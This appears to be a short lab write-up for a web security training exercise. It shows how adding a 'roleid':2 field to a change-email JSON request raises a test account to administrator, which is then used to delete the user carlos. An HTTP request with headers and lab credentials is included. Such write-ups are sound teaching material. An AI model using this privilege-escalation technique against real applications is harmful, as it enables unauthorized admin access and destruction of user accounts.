User role can be modified in user profile


This lab has an admin panel at /admin. It’s only accessible to logged-in users with a roleid of 2.

Reproduction and proof of concept

  1. Log in with credentials wiener:peter and access the account page.

  2. Use the provided feature to update the email address associated with your account.

  3. The response contains your role ID.

  4. Send the email submission request to Burp Repeater, add "roleid":2 into the JSON in the request body, and resend it.

POST /my-account/change-email HTTP/1.1
Cookie: session=kuDuAjpjB1Yrs17aMophAZpeAQf8QQLJ
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 50
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

  1. The response shows your roleid has changed to 2.

  2. Browse to /admin and delete carlos.


An attacker will need to access the admin panel, and use it to delete the user carlos.